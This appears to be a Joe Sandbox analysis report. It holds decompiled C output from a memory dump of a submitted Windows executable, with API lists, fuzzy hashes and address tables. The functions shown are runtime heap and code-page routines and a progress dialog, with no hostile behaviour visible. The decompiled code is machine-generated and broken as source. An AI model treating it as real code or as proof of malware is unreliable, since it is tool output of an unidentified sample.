                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorLastValue$AllocCurrentHeapThread
                              • String ID:
                              • API String ID: 2020098873-0
                              • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                              • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E00417E3A(int _a4) {
                              				signed int _v8;
                              				char _v21;
                              				char _v22;
                              				struct _cpinfo _v28;
                              				void* __ebx;
                              				void* __edi;
                              				intOrPtr* _t36;
                              				signed int _t40;
                              				signed int _t41;
                              				int _t43;
                              				signed int _t47;
                              				signed int _t49;
                              				int _t50;
                              				signed char* _t51;
                              				signed int _t55;
                              				signed char* _t57;
                              				signed int _t60;
                              				intOrPtr* _t63;
                              				signed int _t65;
                              				signed char _t66;
                              				signed char _t68;
                              				signed char _t69;
                              				signed int _t70;
                              				void* _t71;
                              				signed int _t74;
                              				signed int _t77;
                              				signed int _t79;
                              				signed int _t81;
                              				void* _t85;
                              
                              				E0041570A(0x19);
                              				_t50 = E00417FE7(_a4);
                              				_t85 = _t50 -  *0x4256c8; // 0x4e4
                              				_a4 = _t50;
                              				if(_t85 != 0) {
                              					__eflags = _t50;
                              					if(_t50 == 0) {
                              						L30:
                              						E00418064();
                              					} else {
                              						_t65 = 0;
                              						__eflags = 0;
                              						_t36 = 0x422af8;
                              						while(1) {
                              							__eflags =  *_t36 - _t50;
                              							if( *_t36 == _t50) {
                              								break;
                              							}
                              							_t36 = _t36 + 0x30;
                              							_t65 = _t65 + 1;
                              							__eflags = _t36 - 0x422be8;
                              							if(_t36 < 0x422be8) {
                              								continue;
                              							} else {
                              								_t43 = GetCPInfo(_t50,  &_v28);
                              								_t81 = 1;
                              								__eflags = _t43 - _t81;
                              								if(_t43 != _t81) {
                              									__eflags =  *0x423510;
                              									if( *0x423510 == 0) {
                              										_t77 = _t81 | 0xffffffff;
                              										__eflags = _t77;
                              									} else {
                              										goto L30;
                              									}
                              								} else {
                              									 *0x4258e4 =  *0x4258e4 & 0x00000000;
                              									_t60 = 0x40;
                              									__eflags = _v28 - _t81;
                              									memset(0x4257e0, 0, _t60 << 2);
                              									asm("stosb");
                              									 *0x4256c8 = _t50;
                              									if(__eflags <= 0) {
                              										 *0x4256dc =  *0x4256dc & 0x00000000;
                              										__eflags =  *0x4256dc;
                              									} else {
                              										__eflags = _v22;
                              										if(_v22 != 0) {
                              											_t63 =  &_v21;
                              											while(1) {
                              												_t69 =  *_t63;
                              												__eflags = _t69;
                              												if(_t69 == 0) {
                              													goto L24;
                              												}
                              												_t49 =  *(_t63 - 1) & 0x000000ff;
                              												_t70 = _t69 & 0x000000ff;
                              												while(1) {
                              													__eflags = _t49 - _t70;
                              													if(_t49 > _t70) {
                              														break;
                              													}
                              													 *(_t49 + 0x4257e1) =  *(_t49 + 0x4257e1) | 0x00000004;
                              													_t49 = _t49 + 1;
                              												}
                              												_t63 = _t63 + 2;
                              												__eflags =  *(_t63 - 1);
                              												if( *(_t63 - 1) != 0) {
                              													continue;
                              												}
                              												goto L24;
                              											}
                              										}
                              										L24:
                              										_t47 = _t81;
                              										do {
                              											 *(_t47 + 0x4257e1) =  *(_t47 + 0x4257e1) | 0x00000008;
                              											_t47 = _t47 + 1;
                              											__eflags = _t47 - 0xff;
                              										} while (_t47 < 0xff);
                              										 *0x4258e4 = E00418031(_t50);
                              										 *0x4256dc = _t81;
                              									}
                              									_t71 = 0x4256d0;
                              									asm("stosd");
                              									asm("stosd");
                              									asm("stosd");
                              									L31:
                              									E0041808D(_t50, _t71);
                              									goto L1;
                              								}
                              							}
                              							goto L33;
                              						}
                              						_v8 = _v8 & 0x00000000;
                              						_t55 = 0x40;
                              						memset(0x4257e0, 0, _t55 << 2);
                              						_t79 = _t65 + _t65 * 2 << 4;
                              						__eflags = _t79;
                              						asm("stosb");
                              						_t16 = _t79 + 0x422b08; // 0x422b08
                              						_t51 = _t16;
                              						do {
                              							__eflags =  *_t51;
                              							_t57 = _t51;
                              							if( *_t51 != 0) {
                              								while(1) {
                              									_t17 =  &(_t57[1]); // 0xdf
                              									_t66 =  *_t17;
                              									__eflags = _t66;
                              									if(_t66 == 0) {
                              										goto L21;
                              									}
                              									_t41 =  *_t57 & 0x000000ff;
                              									_t74 = _t66 & 0x000000ff;
                              									__eflags = _t41 - _t74;
                              									if(_t41 <= _t74) {
                              										_t19 = _v8 + 0x422af0; // 0x8040201
                              										_t68 =  *_t19;
                              										do {
                              											 *(_t41 + 0x4257e1) =  *(_t41 + 0x4257e1) | _t68;
                              											_t41 = _t41 + 1;
                              											__eflags = _t41 - _t74;
                              										} while (_t41 <= _t74);
                              									}
                              									_t57 =  &(_t57[2]);
                              									__eflags =  *_t57;
                              									if( *_t57 != 0) {
                              										continue;
                              									}
                              									goto L21;
                              								}
                              							}
                              							L21:
                              							_v8 = _v8 + 1;
                              							_t51 =  &(_t51[8]);
                              							__eflags = _v8 - 4;
                              						} while (_v8 < 4);
                              						 *0x4256dc = 1;
                              						 *0x4256c8 = _a4;
                              						_t40 = E00418031(_a4);
                              						_t71 = 0x4256d0;
                              						asm("movsd");
                              						asm("movsd");
                              						 *0x4258e4 = _t40;
                              						asm("movsd");
                              					}
                              					goto L31;
                              				} else {
                              					L1:
                              					_t77 = 0;
                              				}
                              				L33:
                              				E0041576B(0x19);
                              				return _t77;
                              			}

                              APIs
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterInfoInitializeLeave
                              • String ID: +B$WB$WB
                              • API String ID: 1866836854-4076192905
                              • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                              • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E0041458F(void* _a4, long _a8) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				long _v36;
                              				void* _v40;
                              				intOrPtr _v44;
                              				char _v48;
                              				long _v52;
                              				long _v56;
                              				char _v60;
                              				intOrPtr _t56;
                              				void* _t57;
                              				long _t58;
                              				long _t59;
                              				long _t63;
                              				long _t66;
                              				long _t68;
                              				long _t71;
                              				long _t72;
                              				long _t74;
                              				long _t78;
                              				intOrPtr _t80;
                              				void* _t83;
                              				long _t85;
                              				long _t88;
                              				void* _t89;
                              				long _t91;
                              				intOrPtr _t93;
                              				void* _t97;
                              				void* _t104;
                              				long _t113;
                              				long _t116;
                              				intOrPtr _t122;
                              				void* _t123;
                              
                              				_push(0xffffffff);
                              				_push(0x41b9b8);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t122;
                              				_t123 = _t122 - 0x28;
                              				_t97 = _a4;
                              				_t113 = 0;
                              				if(_t97 != 0) {
                              					_t116 = _a8;
                              					__eflags = _t116;
                              					if(_t116 != 0) {
                              						_t56 =  *0x425a38; // 0x1
                              						__eflags = _t56 - 3;
                              						if(_t56 != 3) {
                              							__eflags = _t56 - 2;
                              							if(_t56 != 2) {
                              								while(1) {
                              									_t57 = 0;
                              									__eflags = _t116 - 0xffffffe0;
                              									if(_t116 <= 0xffffffe0) {
                              										__eflags = _t116 - _t113;
                              										if(_t116 == _t113) {
                              											_t116 = 1;
                              										}
                              										_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              										__eflags = _t116;
                              										_t57 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
                              									}
                              									__eflags = _t57 - _t113;
                              									if(_t57 != _t113) {
                              										goto L64;
                              									}
                              									__eflags =  *0x4233b4 - _t113; // 0x0
                              									if(__eflags == 0) {
                              										goto L64;
                              									}
                              									_t58 = E00415868(_t116);
                              									__eflags = _t58;
                              									if(_t58 != 0) {
                              										continue;
                              									}
                              									goto L63;
                              								}
                              								goto L64;
                              							}
                              							__eflags = _t116 - 0xffffffe0;
                              							if(_t116 <= 0xffffffe0) {
                              								__eflags = _t116;
                              								if(_t116 <= 0) {
                              									_t116 = 0x10;
                              								} else {
                              									_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              								}
                              								_a8 = _t116;
                              							}
                              							while(1) {
                              								_v40 = _t113;
                              								__eflags = _t116 - 0xffffffe0;
                              								if(_t116 <= 0xffffffe0) {
                              									E0041570A(9);
                              									_pop(_t104);
                              									_v8 = 1;
                              									_t63 = E004167F8(_t97,  &_v60,  &_v48);
                              									_t123 = _t123 + 0xc;
                              									_t113 = _t63;
                              									_v52 = _t113;
                              									__eflags = _t113;
                              									if(_t113 == 0) {
                              										_v40 = HeapReAlloc( *0x425a34, 0, _t97, _t116);
                              									} else {
                              										__eflags = _t116 -  *0x42283c; // 0x1e0
                              										if(__eflags < 0) {
                              											_t100 = _t116 >> 4;
                              											_t71 = E00416BC0(_t104, _v60, _v48, _t113, _t116 >> 4);
                              											_t123 = _t123 + 0x10;
                              											__eflags = _t71;
                              											if(_t71 == 0) {
                              												_t72 = E00416894(_t104, _t100);
                              												_v40 = _t72;
                              												__eflags = _t72;
                              												if(_t72 != 0) {
                              													_t74 = ( *_t113 & 0x000000ff) << 4;
                              													_v56 = _t74;
                              													__eflags = _t74 - _t116;
                              													if(_t74 >= _t116) {
                              														_t74 = _t116;
                              													}
                              													E00414090(_v40, _a4, _t74);
                              													E0041684F(_v60, _v48, _t113);
                              													_t123 = _t123 + 0x18;
                              												}
                              											} else {
                              												_v40 = _a4;
                              											}
                              											_t97 = _a4;
                              										}
                              										__eflags = _v40;
                              										if(_v40 == 0) {
                              											_t66 = HeapAlloc( *0x425a34, 0, _t116);
                              											_v40 = _t66;
                              											__eflags = _t66;
                              											if(_t66 != 0) {
                              												_t68 = ( *_t113 & 0x000000ff) << 4;
                              												_v56 = _t68;
                              												__eflags = _t68 - _t116;
                              												if(_t68 >= _t116) {
                              													_t68 = _t116;
                              												}
                              												E00414090(_v40, _t97, _t68);
                              												E0041684F(_v60, _v48, _t113);
                              												_t123 = _t123 + 0x18;
                              											}
                              										}
                              									}
                              									_t51 =  &_v8;
                              									 *_t51 = _v8 | 0xffffffff;
                              									__eflags =  *_t51;
                              									E00414868();
                              								}
                              								_t57 = _v40;
                              								__eflags = _t57 - _t113;
                              								if(_t57 != _t113) {
                              									goto L64;
                              								}
                              								__eflags =  *0x4233b4 - _t113; // 0x0
                              								if(__eflags == 0) {
                              									goto L64;
                              								}
                              								_t59 = E00415868(_t116);
                              								__eflags = _t59;
                              								if(_t59 != 0) {
                              									continue;
                              								}
                              								goto L63;
                              							}
                              							goto L64;
                              						} else {
                              							goto L5;
                              						}
                              						do {
                              							L5:
                              							_v40 = _t113;
                              							__eflags = _t116 - 0xffffffe0;
                              							if(_t116 > 0xffffffe0) {
                              								L25:
                              								_t57 = _v40;
                              								__eflags = _t57 - _t113;
                              								if(_t57 != _t113) {
                              									goto L64;
                              								}
                              								__eflags =  *0x4233b4 - _t113; // 0x0
                              								if(__eflags == 0) {
                              									goto L64;
                              								}
                              								goto L27;
                              							}
                              							E0041570A(9);
                              							_v8 = _t113;
                              							_t80 = E00415A9D(_t97);
                              							_v44 = _t80;
                              							__eflags = _t80 - _t113;
                              							if(_t80 == _t113) {
                              								L21:
                              								_v8 = _v8 | 0xffffffff;
                              								E0041471A();
                              								__eflags = _v44 - _t113;
                              								if(_v44 == _t113) {
                              									__eflags = _t116 - _t113;
                              									if(_t116 == _t113) {
                              										_t116 = 1;
                              									}
                              									_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              									__eflags = _t116;
                              									_a8 = _t116;
                              									_v40 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
                              								}
                              								goto L25;
                              							}
                              							__eflags = _t116 -  *0x425a30; // 0x0
                              							if(__eflags <= 0) {
                              								_push(_t116);
                              								_push(_t97);
                              								_push(_t80);
                              								_t88 = E004162A6();
                              								_t123 = _t123 + 0xc;
                              								__eflags = _t88;
                              								if(_t88 == 0) {
                              									_push(_t116);
                              									_t89 = E00415DF1();
                              									_v40 = _t89;
                              									__eflags = _t89 - _t113;
                              									if(_t89 != _t113) {
                              										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
                              										_v36 = _t91;
                              										__eflags = _t91 - _t116;
                              										if(_t91 >= _t116) {
                              											_t91 = _t116;
                              										}
                              										E00414090(_v40, _t97, _t91);
                              										_t93 = E00415A9D(_t97);
                              										_v44 = _t93;
                              										_push(_t97);
                              										_push(_t93);
                              										E00415AC8();
                              										_t123 = _t123 + 0x18;
                              									}
                              								} else {
                              									_v40 = _t97;
                              								}
                              							}
                              							__eflags = _v40 - _t113;
                              							if(_v40 == _t113) {
                              								__eflags = _t116 - _t113;
                              								if(_t116 == _t113) {
                              									_t116 = 1;
                              									_a8 = _t116;
                              								}
                              								_t116 = _t116 + 0x0000000f & 0xfffffff0;
                              								_a8 = _t116;
                              								_t83 = HeapAlloc( *0x425a34, _t113, _t116);
                              								_v40 = _t83;
                              								__eflags = _t83 - _t113;
                              								if(_t83 != _t113) {
                              									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
                              									_v36 = _t85;
                              									__eflags = _t85 - _t116;
                              									if(_t85 >= _t116) {
                              										_t85 = _t116;
                              									}
                              									E00414090(_v40, _t97, _t85);
                              									_push(_t97);
                              									_push(_v44);
                              									E00415AC8();
                              									_t123 = _t123 + 0x14;
                              								}
                              							}
                              							goto L21;
                              							L27:
                              							_t78 = E00415868(_t116);
                              							__eflags = _t78;
                              						} while (_t78 != 0);
                              						goto L63;
                              					} else {
                              						E00413F9F(_t97);
                              						L63:
                              						_t57 = 0;
                              						__eflags = 0;
                              						goto L64;
                              					}
                              				} else {
                              					_t57 = E00413E65(_a8);
                              					L64:
                              					 *[fs:0x0] = _v20;
                              					return _t57;
                              				}
                              			}
                              0x004146f8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004146f8
                              0x004145f8
                              0x004145fe
                              0x00414602
                              0x00414608
                              0x0041460b
                              0x0041460d
                              0x004146b7
                              0x004146b7
                              0x004146bb
                              0x004146c0
                              0x004146c3
                              0x004146c5
                              0x004146c7
                              0x004146cb
                              0x004146cb
                              0x004146cf
                              0x004146cf
                              0x004146d2
                              0x004146e4
                              0x004146e4
                              0x00000000
                              0x004146c3
                              0x00414613
                              0x00414619
                              0x0041461b
                              0x0041461c
                              0x0041461d
                              0x0041461e
                              0x00414623
                              0x00414626
                              0x00414628
                              0x0041462f
                              0x00414630
                              0x00414636
                              0x00414639
                              0x0041463b
                              0x00414640
                              0x00414641
                              0x00414644
                              0x00414646
                              0x00414648
                              0x00414648
                              0x0041464f
                              0x00414655
                              0x0041465a
                              0x0041465d
                              0x0041465e
                              0x0041465f
                              0x00414664
                              0x00414664
                              0x0041462a
                              0x0041462a
                              0x0041462a
                              0x00414628
                              0x00414667
                              0x0041466a
                              0x0041466c
                              0x0041466e
                              0x00414672
                              0x00414673
                              0x00414673
                              0x00414679
                              0x0041467c
                              0x00414687
                              0x0041468d
                              0x00414690
                              0x00414692
                              0x00414697
                              0x00414698
                              0x0041469b
                              0x0041469d
                              0x0041469f
                              0x0041469f
                              0x004146a6
                              0x004146ab
                              0x004146ac
                              0x004146af
                              0x004146b4
                              0x004146b4
                              0x00414692
                              0x00000000
                              0x004146fe
                              0x004146ff
                              0x00414705
                              0x00414705
                              0x00000000
                              0x004145d0
                              0x004145d1
                              0x004148ad
                              0x004148ad
                              0x004148ad
                              0x00000000
                              0x004148ad
                              0x004145bb
                              0x004145be
                              0x004148af
                              0x004148b2
                              0x004148bd
                              0x004148bd

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                              • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041659C() {
                              				void* _t25;
                              				intOrPtr* _t28;
                              				void* _t42;
                              				void* _t43;
                              				void* _t45;
                              				void* _t55;
                              
                              				if( *0x420828 != 0xffffffff) {
                              					_t43 = HeapAlloc( *0x425a34, 0, 0x2020);
                              					if(_t43 == 0) {
                              						goto L20;
                              					}
                              					goto L3;
                              				} else {
                              					_t43 = 0x420818;
                              					L3:
                              					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
                              					if(_t42 == 0) {
                              						L18:
                              						if(_t43 != 0x420818) {
                              							HeapFree( *0x425a34, 0, _t43);
                              						}
                              						L20:
                              						return 0;
                              					}
                              					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
                              						VirtualFree(_t42, 0, 0x8000);
                              						goto L18;
                              					}
                              					if(_t43 != 0x420818) {
                              						 *_t43 = 0x420818;
                              						_t25 =  *0x42081c; // 0x420818
                              						 *(_t43 + 4) = _t25;
                              						 *0x42081c = _t43;
                              						 *( *(_t43 + 4)) = _t43;
                              					} else {
                              						if( *0x420818 == 0) {
                              							 *0x420818 = 0x420818;
                              						}
                              						if( *0x42081c == 0) {
                              							 *0x42081c = 0x420818;
                              						}
                              					}
                              					_t3 = _t42 + 0x400000; // 0x400000
                              					_t4 = _t43 + 0x98; // 0x98
                              					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
                              					_t6 = _t43 + 0x18; // 0x18
                              					_t28 = _t6;
                              					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
                              					 *(_t43 + 0x10) = _t42;
                              					 *((intOrPtr*)(_t43 + 8)) = _t28;
                              					_t45 = 0;
                              					do {
                              						_t55 = _t45 - 0x10;
                              						_t45 = _t45 + 1;
                              						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
                              						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
                              						_t28 = _t28 + 8;
                              					} while (_t45 < 0x400);
                              					E00417DA0(_t42, 0, 0x10000);
                              					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
                              						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
                              						_t16 = _t42 + 8; // -4088
                              						 *_t42 = _t16;
                              						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
                              						_t42 = _t42 + 0x1000;
                              					}
                              					return _t43;
                              				}
                              			}

                              APIs
                              • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                              Similarity
                              • API ID: AllocVirtual$FreeHeap
                              • String ID:
                              • API String ID: 714016831-0
                              • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                              • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00409787(void* __ecx, void* __edx) {
                              				signed int _t48;
                              				intOrPtr* _t54;
                              				signed int _t60;
                              				intOrPtr _t61;
                              				void* _t76;
                              				struct _CRITICAL_SECTION* _t80;
                              				signed int _t81;
                              				void* _t84;
                              				void* _t86;
                              
                              				_t76 = __edx;
                              				E00413954(E00419CC0, _t86);
                              				_t84 = __ecx;
                              				_t80 = __ecx + 0x40;
                              				if(E004095DD(_t80) == 0) {
                              					E0040998D(__ecx);
                              					EnterCriticalSection(_t80);
                              					_t60 =  *(_t80 + 0x20);
                              					 *(_t86 - 0x10) =  *(_t80 + 0x24);
                              					 *((intOrPtr*)(_t86 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
                              					 *((intOrPtr*)(_t86 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
                              					LeaveCriticalSection(_t80);
                              					if(_t60 !=  *((intOrPtr*)(_t84 + 0x28)) ||  *(_t86 - 0x10) !=  *((intOrPtr*)(_t84 + 0x2c))) {
                              						E0040969B(_t84, _t60,  *(_t86 - 0x10));
                              					}
                              					E0040970E(_t84,  *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)));
                              					_t81 = 0;
                              					if((_t60 |  *(_t86 - 0x10)) == 0) {
                              						 *(_t86 - 0x10) = _t81;
                              						_t60 = 1;
                              					}
                              					_t61 = E00413D80(E00414490( *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)), 0x64, _t81), _t76, _t60,  *(_t86 - 0x10));
                              					if(_t61 !=  *((intOrPtr*)(_t84 + 0x34))) {
                              						asm("cdq");
                              						E00403A0B(_t86 - 0xa4, _t76, _t47, _t76);
                              						E00401C80(_t86 - 0x18, _t86 - 0xa4);
                              						 *(_t86 - 4) = _t81;
                              						E00407D25(_t86 - 0x18, _t76, L"% ");
                              						_push(_t84 + 0xc);
                              						_t54 = E00402634(_t86 - 0x24, _t86 - 0x18);
                              						 *(_t86 - 4) = 1;
                              						E00406049( *((intOrPtr*)(_t84 + 4)),  *_t54);
                              						E00403A9C( *((intOrPtr*)(_t86 - 0x24)));
                              						 *((intOrPtr*)(_t84 + 0x34)) = _t61;
                              						E00403A9C( *((intOrPtr*)(_t86 - 0x18)));
                              					}
                              					_t48 = 1;
                              				} else {
                              					_t48 = 1;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
                              				return _t48;
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040978C
                                • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                              • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                              • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                              • __aulldiv.LIBCMT ref: 00409824
                              Similarity
                              • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                              • String ID:
                              • API String ID: 3848147900-0
                              • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                              • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004095F7(void* __ecx) {
                              				void* _t32;
                              
                              				_t32 = __ecx;
                              				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
                              				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
                              				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
                              				 *((char*)(__ecx + 0x38)) = 1;
                              				E00413260(__ecx + 0x3c);
                              				 *((intOrPtr*)(_t32 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x3e8);
                              				if( *(_t32 + 0x70) >= 0) {
                              					SendMessageA( *(_t32 + 4), 0x80, 1, LoadIconA( *0x423144,  *(_t32 + 0x70) & 0x0000ffff));
                              				}
                              				 *((intOrPtr*)(_t32 + 8)) = SetTimer( *(_t32 + 4), 3, 0x64, 0);
                              				E00406049( *(_t32 + 4),  *((intOrPtr*)(_t32 + 0xc)));
                              				E0040998D(_t32);
                              				return 1;
                              			}

                              APIs
                                • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                              • GetDlgItem.USER32 ref: 0040961A
                              • LoadIconA.USER32(00000000), ref: 00409634
                              • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00409645
                              • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00409654
                              Similarity
                              • API ID: EventIconItemLoadMessageSendTimer
                              • String ID:
                              • API String ID: 2758541657-0
                              • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                              • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040D7CC(void* __ecx) {
                              				signed int _t118;
                              				signed int _t129;
                              				signed int* _t130;
                              				signed int _t150;
                              				signed int _t151;
                              				signed int _t160;
                              				intOrPtr _t162;
                              				signed int* _t180;
                              				signed int _t181;
                              				signed int _t190;
                              				signed int _t191;
                              				signed int _t192;
                              				signed int _t195;
                              				signed int _t196;
                              				intOrPtr _t198;
                              				void* _t200;
                              				signed int* _t202;
                              				void* _t203;
                              
                              				E00413954(E0041A61C, _t203);
                              				_t200 = __ecx;
